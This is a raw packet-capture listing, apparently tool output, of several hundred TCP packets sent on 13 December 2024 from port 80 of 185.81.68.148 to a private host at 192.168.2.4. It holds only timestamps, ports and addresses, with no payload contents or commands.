Dec 13, 2024 07:47:47.488415956 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.488425016 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.488435030 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.488464117 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.488523006 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.488533020 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.488542080 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.488548994 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.488883972 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.488938093 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.488948107 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.488965034 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.488974094 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.489008904 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.489027023 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.489137888 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.489147902 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.489151955 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.489155054 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.489173889 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.489183903 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.489192009 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.489211082 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.489221096 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.489229918 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.489240885 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.489249945 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.489588976 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.489599943 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.489664078 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.489675045 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.489706039 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.489715099 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.489753008 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.489762068 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.489769936 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.490139961 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.490165949 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.490217924 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.490227938 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.490246058 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.490258932 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.490268946 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.490302086 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.490312099 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.490319967 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.490330935 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.490387917 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.490456104 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.490466118 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.490475893 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.490487099 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.490497112 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.490839958 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.490885019 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.490928888 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.490938902 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.490968943 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.491033077 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.491043091 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.491058111 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.491066933 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.491075039 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.491107941 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.491116047 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.491127014 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.491162062 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.491182089 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.491197109 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.491205931 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.492002010 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.492027998 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.492038965 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.492096901 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.492144108 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.492172003 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.492194891 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.492203951 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.492212057 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.492291927 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.492302895 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.492311954 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.492317915 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.492321014 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.492332935 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.492336988 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.492413044 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.492425919 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.492439985 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.492458105 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.492921114 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.492942095 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.493051052 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.493098021 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.493107080 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.493124008 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.493135929 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.493187904 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.493246078 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.493254900 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.493263960 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.493279934 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.493309975 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.493318081 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.493328094 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.493362904 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.493371964 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.493817091 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.493827105 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.493844032 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.493859053 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.493870974 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.493902922 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.493915081 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.493936062 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.493979931 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.493988991 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.493993044 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.494000912 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.494012117 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.494091988 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.494100094 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.494107962 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.494122982 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.494132042 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.494512081 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.494558096 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.494616985 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.494626045 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.494633913 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.494643927 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.494666100 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.494677067 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.494693041 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.494702101 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.494710922 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.494734049 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.494743109 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.494774103 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.494782925 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.494808912 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.494868040 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.495186090 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.495225906 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.495234966 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.495266914 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.495275974 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.495318890 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.495330095 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.495340109 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.495349884 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.495414972 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.495815039 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.495826006 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.495835066 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.495939016 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.495949984 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.495958090 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.495965958 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.495975018 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.495984077 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.495992899 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.496001959 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.496011972 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.496020079 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.496027946 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.496036053 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.496046066 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.496053934 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.496072054 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.496342897 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.496351957 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.496360064 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.496367931 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.496448994 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.496460915 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.496475935 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.496495008 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.496504068 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.496512890 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.496520996 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.496531010 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.496547937 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.496556997 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.496566057 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.496575117 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.496592045 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.496601105 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.496670008 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.497001886 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.497011900 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.497020006 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.497030020 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.497039080 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.497055054 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.497065067 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.497073889 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.497148037 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.497157097 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.497165918 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.497174978 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.497184038 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.497200966 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.497210026 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.497216940 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.497225046 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.497234106 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.497242928 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.497519970 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.497567892 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.497576952 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.497700930 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.497710943 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.497719049 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.497728109 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.497736931 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.497745991 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.497754097 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.497761965 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.497771025 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.497780085 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.497788906 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.497797966 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.497807026 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.497823954 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.497951031 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.497999907 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.498008966 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.498018980 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.498079062 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.498087883 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.498095036 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.498111010 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.498120070 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.498155117 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.498164892 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.498186111 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.498224974 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.498234034 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.498265982 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.498315096 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.498326063 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.498354912 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.550347090 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.550373077 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.550385952 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.550401926 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.550410986 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.550676107 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.550714970 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.550724983 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.550787926 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.550796986 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.550803900 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.551239967 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.551306963 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.551362038 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.551371098 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.551424980 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.551440954 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.551450014 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.551527023 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.551536083 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.551542997 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.551979065 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.551995039 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.552066088 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.552074909 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.552082062 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.552104950 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.552114010 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.552153111 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.552202940 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.552239895 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.552299023 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.552308083 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.552349091 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.552357912 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.552366018 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.552463055 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.552730083 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.552740097 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.552747011 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.552763939 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.552772045 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.552788973 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.552797079 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.552812099 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.552820921 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.552896023 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.552905083 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.552917004 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.552926064 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.552933931 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.552942038 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.552958965 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.552968979 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.553441048 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.553476095 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.553486109 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.553493023 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.553509951 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.553519011 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.553534031 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.553559065 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.553567886 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.553580999 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.553590059 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.553622961 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.553632021 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.553656101 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.553664923 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.553689957 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.553705931 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.553930998 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.553940058 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.553947926 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.553977966 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.553987026 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.553994894 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.554017067 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.554025888 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.554040909 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.554049969 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.554063082 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.601016998 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.601043940 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.601052999 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.601057053 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.601068020 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.601115942 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.601125956 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.601134062 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.601144075 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.601154089 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.601195097 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.601203918 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.601233959 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.601243019 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.601629972 CET	80	49773	185.81.68.147	192.168.2.4
